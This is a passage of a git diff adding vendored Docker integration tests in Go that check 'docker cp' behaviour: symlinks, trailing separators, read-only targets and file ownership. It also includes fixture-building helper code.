+	c.Assert(out, checker.Contains, "-rw")
+}
+
+func (s *DockerSuite) TestCpNameHasColon(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo lololol > /te:s:t")
+
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	tmpdir, err := ioutil.TempDir("", "docker-integration")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpdir)
+	dockerCmd(c, "cp", containerID+":/te:s:t", tmpdir)
+	content, err := ioutil.ReadFile(tmpdir + "/te:s:t")
+	c.Assert(string(content), checker.Equals, "lololol\n")
+}
+
+func (s *DockerSuite) TestCopyAndRestart(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	expectedMsg := "hello"
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "echo", expectedMsg)
+	containerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", containerID)
+	// failed to set up container
+	c.Assert(strings.TrimSpace(out), checker.Equals, "0")
+
+	tmpDir, err := ioutil.TempDir("", "test-docker-restart-after-copy-")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpDir)
+
+	dockerCmd(c, "cp", fmt.Sprintf("%s:/etc/group", containerID), tmpDir)
+
+	out, _ = dockerCmd(c, "start", "-a", containerID)
+
+	c.Assert(strings.TrimSpace(out), checker.Equals, expectedMsg)
+}
+
+func (s *DockerSuite) TestCopyCreatedContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "create", "--name", "test_cp", "-v", "/test", "busybox")
+
+	tmpDir, err := ioutil.TempDir("", "test")
+	c.Assert(err, checker.IsNil)
+	defer os.RemoveAll(tmpDir)
+	dockerCmd(c, "cp", "test_cp:/bin/sh", tmpDir)
+}
+
+// test copy with option `-L`: following symbol link
+// Check that symlinks to a file behave as expected when copying one from
+// a container to host following symbol link
+func (s *DockerSuite) TestCpSymlinkFromConToHostFollowSymlink(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, exitCode := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir -p '"+cpTestPath+"' && echo -n '"+cpContainerContents+"' > "+cpFullPath+" && ln -s "+cpFullPath+" /dir_link")
+	if exitCode != 0 {
+		c.Fatal("failed to create a container", out)
+	}
+
+	cleanedContainerID := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "wait", cleanedContainerID)
+	if strings.TrimSpace(out) != "0" {
+		c.Fatal("failed to set up container", out)
+	}
+
+	testDir, err := ioutil.TempDir("", "test-cp-symlink-container-to-host-follow-symlink")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(testDir)
+
+	// This copy command should copy the symlink, not the target, into the
+	// temporary directory.
+	dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", testDir)
+
+	expectedPath := filepath.Join(testDir, "dir_link")
+
+	expected := []byte(cpContainerContents)
+	actual, err := ioutil.ReadFile(expectedPath)
+
+	if !bytes.Equal(actual, expected) {
+		c.Fatalf("Expected copied file to be duplicate of the container symbol link target")
+	}
+	os.Remove(expectedPath)
+
+	// now test copy symbol link to a non-existing file in host
+	expectedPath = filepath.Join(testDir, "somefile_host")
+	// expectedPath shouldn't exist, if exists, remove it
+	if _, err := os.Lstat(expectedPath); err == nil {
+		os.Remove(expectedPath)
+	}
+
+	dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", expectedPath)
+
+	actual, err = ioutil.ReadFile(expectedPath)
+
+	if !bytes.Equal(actual, expected) {
+		c.Fatalf("Expected copied file to be duplicate of the container symbol link target")
+	}
+	defer os.Remove(expectedPath)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go
new file mode 100644
index 0000000000..f981cb8f8b
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go
@@ -0,0 +1,599 @@
+package main
+
+import (
+	"os"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// docker cp LOCALPATH CONTAINER:PATH
+
+// Try all of the test cases from the archive package which implements the
+// internals of `docker cp` and ensure that the behavior matches when actually
+// copying to and from containers.
+
+// Basic assumptions about SRC and DST:
+// 1. SRC must exist.
+// 2. If SRC ends with a trailing separator, it must be a directory.
+// 3. DST parent directory must exist.
+// 4. If DST exists as a file, it must not end with a trailing separator.
+
+// First get these easy error cases out of the way.
+
+// Test for error when SRC does not exist.
+func (s *DockerSuite) TestCpToErrSrcNotExists(c *check.C) {
+	containerID := makeTestContainer(c, testContainerOptions{})
+
+	tmpDir := getTestDir(c, "test-cp-to-err-src-not-exists")
+	defer os.RemoveAll(tmpDir)
+
+	srcPath := cpPath(tmpDir, "file1")
+	dstPath := containerCpPath(containerID, "file1")
+
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
+}
+
+// Test for error when SRC ends in a trailing
+// path separator but it exists as a file.
+func (s *DockerSuite) TestCpToErrSrcNotDir(c *check.C) {
+	containerID := makeTestContainer(c, testContainerOptions{})
+
+	tmpDir := getTestDir(c, "test-cp-to-err-src-not-dir")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcPath := cpPathTrailingSep(tmpDir, "file1")
+	dstPath := containerCpPath(containerID, "testDir")
+
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err))
+}
+
+// Test for error when SRC is a valid file or directory,
+// bu the DST parent directory does not exist.
+func (s *DockerSuite) TestCpToErrDstParentNotExists(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-to-err-dst-parent-not-exists")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	// Try with a file source.
+	srcPath := cpPath(tmpDir, "file1")
+	dstPath := containerCpPath(containerID, "/notExists", "file1")
+
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
+
+	// Try with a directory source.
+	srcPath = cpPath(tmpDir, "dir1")
+
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err))
+}
+
+// Test for error when DST ends in a trailing path separator but exists as a
+// file. Also test that we cannot overwrite an existing directory with a
+// non-directory and cannot overwrite an existing
+func (s *DockerSuite) TestCpToErrDstNotDir(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{addContent: true})
+
+	tmpDir := getTestDir(c, "test-cp-to-err-dst-not-dir")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	// Try with a file source.
+	srcPath := cpPath(tmpDir, "dir1/file1-1")
+	dstPath := containerCpPathTrailingSep(containerID, "file1")
+
+	// The client should encounter an error trying to stat the destination
+	// and then be unable to copy since the destination is asserted to be a
+	// directory but does not exist.
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExist error, but got %T: %s", err, err))
+
+	// Try with a directory source.
+	srcPath = cpPath(tmpDir, "dir1")
+
+	// The client should encounter an error trying to stat the destination and
+	// then decide to extract to the parent directory instead with a rebased
+	// name in the source archive, but this directory would overwrite the
+	// existing file with the same name.
+	err = runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCannotOverwriteNonDirWithDir(err), checker.True, check.Commentf("expected CannotOverwriteNonDirWithDir error, but got %T: %s", err, err))
+}
+
+// Check that copying from a local path to a symlink in a container copies to
+// the symlink target and does not overwrite the container symlink itself.
+func (s *DockerSuite) TestCpToSymlinkDestination(c *check.C) {
+	//  stat /tmp/test-cp-to-symlink-destination-262430901/vol3 gets permission denied for the user
+	testRequires(c, NotUserNamespace)
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon) // Requires local volume mount bind.
+
+	testVol := getTestDir(c, "test-cp-to-symlink-destination-")
+	defer os.RemoveAll(testVol)
+
+	makeTestContentInDir(c, testVol)
+
+	containerID := makeTestContainer(c, testContainerOptions{
+		volumes: defaultVolumes(testVol), // Our bind mount is at /vol2
+	})
+
+	// First, copy a local file to a symlink to a file in the container. This
+	// should overwrite the symlink target contents with the source contents.
+	srcPath := cpPath(testVol, "file2")
+	dstPath := containerCpPath(containerID, "/vol2/symlinkToFile1")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToFile1"), "file1"), checker.IsNil)
+
+	// The file should have the contents of "file2" now.
+	c.Assert(fileContentEquals(c, cpPath(testVol, "file1"), "file2\n"), checker.IsNil)
+
+	// Next, copy a local file to a symlink to a directory in the container.
+	// This should copy the file into the symlink target directory.
+	dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil)
+
+	// The file should have the contents of "file2" now.
+	c.Assert(fileContentEquals(c, cpPath(testVol, "file2"), "file2\n"), checker.IsNil)
+
+	// Next, copy a file to a symlink to a file that does not exist (a broken
+	// symlink) in the container. This should create the target file with the
+	// contents of the source file.
+	dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToFileX")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToFileX"), "fileX"), checker.IsNil)
+
+	// The file should have the contents of "file2" now.
+	c.Assert(fileContentEquals(c, cpPath(testVol, "fileX"), "file2\n"), checker.IsNil)
+
+	// Next, copy a local directory to a symlink to a directory in the
+	// container. This should copy the directory into the symlink target
+	// directory and not modify the symlink.
+	srcPath = cpPath(testVol, "/dir2")
+	dstPath = containerCpPath(containerID, "/vol2/symlinkToDir1")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "symlinkToDir1"), "dir1"), checker.IsNil)
+
+	// The directory should now contain a copy of "dir2".
+	c.Assert(fileContentEquals(c, cpPath(testVol, "dir1/dir2/file2-1"), "file2-1\n"), checker.IsNil)
+
+	// Next, copy a local directory to a symlink to a local directory that does
+	// not exist (a broken symlink) in the container. This should create the
+	// target as a directory with the contents of the source directory. It
+	// should not modify the symlink.
+	dstPath = containerCpPath(containerID, "/vol2/brokenSymlinkToDirX")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// The symlink should not have been modified.
+	c.Assert(symlinkTargetEquals(c, cpPath(testVol, "brokenSymlinkToDirX"), "dirX"), checker.IsNil)
+
+	// The "dirX" directory should now be a copy of "dir2".
+	c.Assert(fileContentEquals(c, cpPath(testVol, "dirX/file2-1"), "file2-1\n"), checker.IsNil)
+}
+
+// Possibilities are reduced to the remaining 10 cases:
+//
+//  case | srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action
+// ===================================================================================================
+//   A   |  no      |  -              |  no       |  -       |  no      |  create file
+//   B   |  no      |  -              |  no       |  -       |  yes     |  error
+//   C   |  no      |  -              |  yes      |  no      |  -       |  overwrite file
+//   D   |  no      |  -              |  yes      |  yes     |  -       |  create file in dst dir
+//   E   |  yes     |  no             |  no       |  -       |  -       |  create dir, copy contents
+//   F   |  yes     |  no             |  yes      |  no      |  -       |  error
+//   G   |  yes     |  no             |  yes      |  yes     |  -       |  copy dir and contents
+//   H   |  yes     |  yes            |  no       |  -       |  -       |  create dir, copy contents
+//   I   |  yes     |  yes            |  yes      |  no      |  -       |  error
+//   J   |  yes     |  yes            |  yes      |  yes     |  -       |  copy dir contents
+//
+
+// A. SRC specifies a file and DST (no trailing path separator) doesn't
+//    exist. This should create a file with the name DST and copy the
+//    contents of the source file into it.
+func (s *DockerSuite) TestCpToCaseA(c *check.C) {
+	containerID := makeTestContainer(c, testContainerOptions{
+		workDir: "/root", command: makeCatFileCommand("itWorks.txt"),
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-a")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcPath := cpPath(tmpDir, "file1")
+	dstPath := containerCpPath(containerID, "/root/itWorks.txt")
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil)
+}
+
+// B. SRC specifies a file and DST (with trailing path separator) doesn't
+//    exist. This should cause an error because the copy operation cannot
+//    create a directory when copying a single file.
+func (s *DockerSuite) TestCpToCaseB(c *check.C) {
+	containerID := makeTestContainer(c, testContainerOptions{
+		command: makeCatFileCommand("testDir/file1"),
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-b")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcPath := cpPath(tmpDir, "file1")
+	dstDir := containerCpPathTrailingSep(containerID, "testDir")
+
+	err := runDockerCp(c, srcPath, dstDir)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err))
+}
+
+// C. SRC specifies a file and DST exists as a file. This should overwrite
+//    the file at DST with the contents of the source file.
+func (s *DockerSuite) TestCpToCaseC(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+		command: makeCatFileCommand("file2"),
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-c")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcPath := cpPath(tmpDir, "file1")
+	dstPath := containerCpPath(containerID, "/root/file2")
+
+	// Ensure the container's file starts with the original content.
+	c.Assert(containerStartOutputEquals(c, containerID, "file2\n"), checker.IsNil)
+
+	c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil)
+
+	// Should now contain file1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil)
+}
+
+// D. SRC specifies a file and DST exists as a directory. This should place
+//    a copy of the source file inside it using the basename from SRC. Ensure
+//    this works whether DST has a trailing path separator or not.
+func (s *DockerSuite) TestCpToCaseD(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true,
+		command:    makeCatFileCommand("/dir1/file1"),
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-d")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcPath := cpPath(tmpDir, "file1")
+	dstDir := containerCpPath(containerID, "dir1")
+
+	// Ensure that dstPath doesn't exist.
+	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
+
+	c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil)
+
+	// Should now contain file1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// Make new destination container.
+	containerID = makeTestContainer(c, testContainerOptions{
+		addContent: true,
+		command:    makeCatFileCommand("/dir1/file1"),
+	})
+
+	dstDir = containerCpPathTrailingSep(containerID, "dir1")
+
+	// Ensure that dstPath doesn't exist.
+	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
+
+	c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil)
+
+	// Should now contain file1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1\n"), checker.IsNil)
+}
+
+// E. SRC specifies a directory and DST does not exist. This should create a
+//    directory at DST and copy the contents of the SRC directory into the DST
+//    directory. Ensure this works whether DST has a trailing path separator or
+//    not.
+func (s *DockerSuite) TestCpToCaseE(c *check.C) {
+	containerID := makeTestContainer(c, testContainerOptions{
+		command: makeCatFileCommand("/testDir/file1-1"),
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-e")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := cpPath(tmpDir, "dir1")
+	dstDir := containerCpPath(containerID, "testDir")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	// Should now contain file1-1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// Make new destination container.
+	containerID = makeTestContainer(c, testContainerOptions{
+		command: makeCatFileCommand("/testDir/file1-1"),
+	})
+
+	dstDir = containerCpPathTrailingSep(containerID, "testDir")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	// Should now contain file1-1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
+}
+
+// F. SRC specifies a directory and DST exists as a file. This should cause an
+//    error as it is not possible to overwrite a file with a directory.
+func (s *DockerSuite) TestCpToCaseF(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-f")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := cpPath(tmpDir, "dir1")
+	dstFile := containerCpPath(containerID, "/root/file1")
+
+	err := runDockerCp(c, srcDir, dstFile)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err))
+}
+
+// G. SRC specifies a directory and DST exists as a directory. This should copy
+//    the SRC directory and all its contents to the DST directory. Ensure this
+//    works whether DST has a trailing path separator or not.
+func (s *DockerSuite) TestCpToCaseG(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+		command: makeCatFileCommand("dir2/dir1/file1-1"),
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-g")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := cpPath(tmpDir, "dir1")
+	dstDir := containerCpPath(containerID, "/root/dir2")
+
+	// Ensure that dstPath doesn't exist.
+	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	// Should now contain file1-1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// Make new destination container.
+	containerID = makeTestContainer(c, testContainerOptions{
+		addContent: true,
+		command:    makeCatFileCommand("/dir2/dir1/file1-1"),
+	})
+
+	dstDir = containerCpPathTrailingSep(containerID, "/dir2")
+
+	// Ensure that dstPath doesn't exist.
+	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	// Should now contain file1-1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
+}
+
+// H. SRC specifies a directory's contents only and DST does not exist. This
+//    should create a directory at DST and copy the contents of the SRC
+//    directory (but not the directory itself) into the DST directory. Ensure
+//    this works whether DST has a trailing path separator or not.
+func (s *DockerSuite) TestCpToCaseH(c *check.C) {
+	containerID := makeTestContainer(c, testContainerOptions{
+		command: makeCatFileCommand("/testDir/file1-1"),
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-h")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := cpPathTrailingSep(tmpDir, "dir1") + "."
+	dstDir := containerCpPath(containerID, "testDir")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	// Should now contain file1-1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// Make new destination container.
+	containerID = makeTestContainer(c, testContainerOptions{
+		command: makeCatFileCommand("/testDir/file1-1"),
+	})
+
+	dstDir = containerCpPathTrailingSep(containerID, "testDir")
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	// Should now contain file1-1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
+}
+
+// I. SRC specifies a directory's contents only and DST exists as a file. This
+//    should cause an error as it is not possible to overwrite a file with a
+//    directory.
+func (s *DockerSuite) TestCpToCaseI(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-i")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := cpPathTrailingSep(tmpDir, "dir1") + "."
+	dstFile := containerCpPath(containerID, "/root/file1")
+
+	err := runDockerCp(c, srcDir, dstFile)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err))
+}
+
+// J. SRC specifies a directory's contents only and DST exists as a directory.
+//    This should copy the contents of the SRC directory (but not the directory
+//    itself) into the DST directory. Ensure this works whether DST has a
+//    trailing path separator or not.
+func (s *DockerSuite) TestCpToCaseJ(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	containerID := makeTestContainer(c, testContainerOptions{
+		addContent: true, workDir: "/root",
+		command: makeCatFileCommand("/dir2/file1-1"),
+	})
+
+	tmpDir := getTestDir(c, "test-cp-to-case-j")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcDir := cpPathTrailingSep(tmpDir, "dir1") + "."
+	dstDir := containerCpPath(containerID, "/dir2")
+
+	// Ensure that dstPath doesn't exist.
+	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	// Should now contain file1-1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
+
+	// Now try again but using a trailing path separator for dstDir.
+
+	// Make new destination container.
+	containerID = makeTestContainer(c, testContainerOptions{
+		command: makeCatFileCommand("/dir2/file1-1"),
+	})
+
+	dstDir = containerCpPathTrailingSep(containerID, "/dir2")
+
+	// Ensure that dstPath doesn't exist.
+	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
+
+	c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil)
+
+	// Should now contain file1-1's contents.
+	c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil)
+}
+
+// The `docker cp` command should also ensure that you cannot
+// write to a container rootfs that is marked as read-only.
+func (s *DockerSuite) TestCpToErrReadOnlyRootfs(c *check.C) {
+	// --read-only + userns has remount issues
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	tmpDir := getTestDir(c, "test-cp-to-err-read-only-rootfs")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	containerID := makeTestContainer(c, testContainerOptions{
+		readOnly: true, workDir: "/root",
+		command: makeCatFileCommand("shouldNotExist"),
+	})
+
+	srcPath := cpPath(tmpDir, "file1")
+	dstPath := containerCpPath(containerID, "/root/shouldNotExist")
+
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrContainerRootfsReadonly error, but got %T: %s", err, err))
+
+	// Ensure that dstPath doesn't exist.
+	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
+}
+
+// The `docker cp` command should also ensure that you
+// cannot write to a volume that is mounted as read-only.
+func (s *DockerSuite) TestCpToErrReadOnlyVolume(c *check.C) {
+	// --read-only + userns has remount issues
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	tmpDir := getTestDir(c, "test-cp-to-err-read-only-volume")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	containerID := makeTestContainer(c, testContainerOptions{
+		volumes: defaultVolumes(tmpDir), workDir: "/root",
+		command: makeCatFileCommand("/vol_ro/shouldNotExist"),
+	})
+
+	srcPath := cpPath(tmpDir, "file1")
+	dstPath := containerCpPath(containerID, "/vol_ro/shouldNotExist")
+
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.NotNil)
+
+	c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrVolumeReadonly error, but got %T: %s", err, err))
+
+	// Ensure that dstPath doesn't exist.
+	c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go
new file mode 100644
index 0000000000..45d85ba5d1
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go
@@ -0,0 +1,39 @@
+// +build !windows
+
+package main
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/system"
+	"github.com/go-check/check"
+)
+
+// Check ownership is root, both in non-userns and userns enabled modes
+func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) {
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	tmpVolDir := getTestDir(c, "test-cp-tmpvol")
+	containerID := makeTestContainer(c,
+		testContainerOptions{volumes: []string{fmt.Sprintf("%s:/tmpvol", tmpVolDir)}})
+
+	tmpDir := getTestDir(c, "test-cp-to-check-ownership")
+	defer os.RemoveAll(tmpDir)
+
+	makeTestContentInDir(c, tmpDir)
+
+	srcPath := cpPath(tmpDir, "file1")
+	dstPath := containerCpPath(containerID, "/tmpvol", "file1")
+
+	err := runDockerCp(c, srcPath, dstPath)
+	c.Assert(err, checker.IsNil)
+
+	stat, err := system.Stat(filepath.Join(tmpVolDir, "file1"))
+	c.Assert(err, checker.IsNil)
+	uid, gid, err := getRootUIDGID()
+	c.Assert(err, checker.IsNil)
+	c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Copied file not owned by container root UID"))
+	c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Copied file not owned by container root GID"))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go
new file mode 100644
index 0000000000..0501c5d735
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go
@@ -0,0 +1,303 @@
+package main
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+type fileType uint32
+
+const (
+	ftRegular fileType = iota
+	ftDir
+	ftSymlink
+)
+
+type fileData struct {
+	filetype fileType
+	path     string
+	contents string
+}
+
+func (fd fileData) creationCommand() string {
+	var command string
+
+	switch fd.filetype {
+	case ftRegular:
+		// Don't overwrite the file if it already exists!
+		command = fmt.Sprintf("if [ ! -f %s ]; then echo %q > %s; fi", fd.path, fd.contents, fd.path)
+	case ftDir:
+		command = fmt.Sprintf("mkdir -p %s", fd.path)
+	case ftSymlink:
+		command = fmt.Sprintf("ln -fs %s %s", fd.contents, fd.path)
+	}
+
+	return command
+}
+
+func mkFilesCommand(fds []fileData) string {
+	commands := make([]string, len(fds))
+
+	for i, fd := range fds {
+		commands[i] = fd.creationCommand()
+	}
+
+	return strings.Join(commands, " && ")
+}
+
+var defaultFileData = []fileData{
+	{ftRegular, "file1", "file1"},
+	{ftRegular, "file2", "file2"},
+	{ftRegular, "file3", "file3"},
+	{ftRegular, "file4", "file4"},
+	{ftRegular, "file5", "file5"},
+	{ftRegular, "file6", "file6"},
+	{ftRegular, "file7", "file7"},
+	{ftDir, "dir1", ""},
+	{ftRegular, "dir1/file1-1", "file1-1"},
+	{ftRegular, "dir1/file1-2", "file1-2"},
+	{ftDir, "dir2", ""},
+	{ftRegular, "dir2/file2-1", "file2-1"},
+	{ftRegular, "dir2/file2-2", "file2-2"},
+	{ftDir, "dir3", ""},
+	{ftRegular, "dir3/file3-1", "file3-1"},
+	{ftRegular, "dir3/file3-2", "file3-2"},
+	{ftDir, "dir4", ""},
+	{ftRegular, "dir4/file3-1", "file4-1"},
